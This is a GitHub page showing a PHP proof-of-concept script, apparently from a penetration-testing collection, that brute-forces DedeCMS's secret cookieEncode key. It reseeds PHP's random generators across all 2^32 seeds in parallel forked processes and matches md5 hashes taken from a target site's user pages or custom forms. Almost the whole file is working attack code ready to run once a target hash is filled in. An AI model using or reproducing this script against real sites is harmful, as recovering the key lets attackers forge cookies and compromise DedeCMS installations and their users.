forked from safe6Sec/Penetration_Testing_POC
-
Notifications
You must be signed in to change notification settings - Fork 1
/
dede_funcookie.php
88 lines (83 loc) · 2.57 KB
/
dede_funcookie.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
<?php
$t1=microtime(true);
echo "开始时间: $t1\n";
//请填写下面的信息
$cpu = 8; // cpu: CPU核数,$cpu对应到开启的进程的数量,不宜过高
$attack_method = 2; // 碰撞类型: 如果是用户主页就是1, 自定义表单就是2
$attack_param = ""; // 数据: 选择1填写uid, 选择2填写dede_fields
$attack_hash = ""; // hash: 填写hash
$max_ = 4294967296;
$targets_ = [];
$the_1 = (int)($max_ / $cpu);
$the_2 = $max_ % $cpu;
for ($i = 0; $i < $cpu; $i++){
array_push($targets_,[($i)*$the_1,($i+1)*$the_1]);
}
$chars='abcdefghigklmnopqrstuvwxwyABCDEFGHIGKLMNOPQRSTUVWXWY0123456789';
$max = 61; // strlen($chars) - 1;
$already_test = 0;
for ($i = 0; $i < $cpu; $i++){
$pid = pcntl_fork();
if ($pid == -1) {
die("could not fork");
} elseif ($pid) {
;
//echo $pid;
//echo "I'm the Parent $i\n";
} else {
//var_dump($targets_[$i][0]);
the_poc($targets_[$i][0],$targets_[$i][1],$i);
exit;
}
}
function the_poc($start,$end,$id){
global $chars;
global $max;
global $attack_method;
global $attack_param;
global $attack_hash;
$the_whole = (int)(($end-$start)/1000000);
$i_do = 0;
for($y = $start; $y<= $end; $y++) {
if (($i_do%1000000) == 1){
echo "$id 已完成(x1000000): ";
echo (int)($i_do/1000000);
echo "/$the_whole\n";
}
$i_do = $i_do + 1;
srand($y);
$length = rand(28,32);
mt_srand($y);
$rnd_cookieEncode='';
for($i = 0; $i < $length; $i++) {
$rnd_cookieEncode .= $chars[mt_rand(0, $max)];
}
if ($attack_method==1){
if (substr(md5($rnd_cookieEncode.$attack_param),0,16) == $attack_hash){
echo "here!!!!\n";
echo $rnd_cookieEncode;
echo "\n";
echo $y;
echo "\n";
break;
}
}else{
if (md5($attack_param.$rnd_cookieEncode) == $attack_hash){
echo "here!!!!\n";
echo $rnd_cookieEncode;
echo "\n";
echo $y;
echo "\n";
}
}
}
}
// 等待子进程执行结束
while (pcntl_waitpid(0, $status) != -1) {
$status = pcntl_wexitstatus($status);
$pid = posix_getpid();
echo "Child $status completed\n";
}
$t2=microtime(true)-$t1; //获取程序1,结束的时间
echo "总计用时: $t2\n";
?>